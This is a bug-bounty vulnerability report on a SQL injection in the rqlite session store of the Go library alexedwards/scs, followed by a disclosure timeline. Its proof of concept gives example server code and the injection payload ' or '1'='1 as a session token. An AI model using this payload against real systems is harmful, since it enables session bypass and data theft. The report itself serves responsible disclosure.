SQL Injection in alexedwards/scs
Valid
Reported on
May 24th 2022
Description
A SQL Injection in rqlite store
Proof of Concept
use example code
package main
import (
"io"
"log"
"net/http"
"github.com/alexedwards/scs/rqlitestore"
"github.com/alexedwards/scs/v2"
"github.com/rqlite/gorqlite"
)
var sessionManager *scs.SessionManager
func main() {
// Establish connection to rqlite.
conn, err := gorqlite.Open("http://localhost:4001/")
if err != nil {
log.Fatal(err)
}
defer conn.Close()
// Initialize a new session manager and configure it to use rqlitestore as the session store.
sessionManager = scs.New()
sessionManager.Store = rqlitestore.New(conn)
mux := http.NewServeMux()
mux.HandleFunc("/put", putHandler)
mux.HandleFunc("/get", getHandler)
http.ListenAndServe(":4000", sessionManager.LoadAndSave(mux))
}
func putHandler(w http.ResponseWriter, r *http.Request) {
sessionManager.Put(r.Context(), "message", "Hello from a session!")
}
func getHandler(w http.ResponseWriter, r *http.Request) {
msg := sessionManager.GetString(r.Context(), "message")
io.WriteString(w, msg)
}
use ' or '1'='1 as token, then access /get
a debug view looks like this
Impact
extract data or login as admin (basic vulnerabilities a SQL Injection has, more severely since it happens in a session middleware)
We are processing your report and will contact the
alexedwards/scs
team within 24 hours.
a month ago
cokebeer modified the report
a month ago
We have contacted a member of the
alexedwards/scs
team and are waiting to hear back
a month ago
We have sent a
follow up to the
alexedwards/scs
team.
We will try again in 7 days.
a month ago
The researcher's credibility has increased: +7
The fix bounty has been dropped
to join this conversation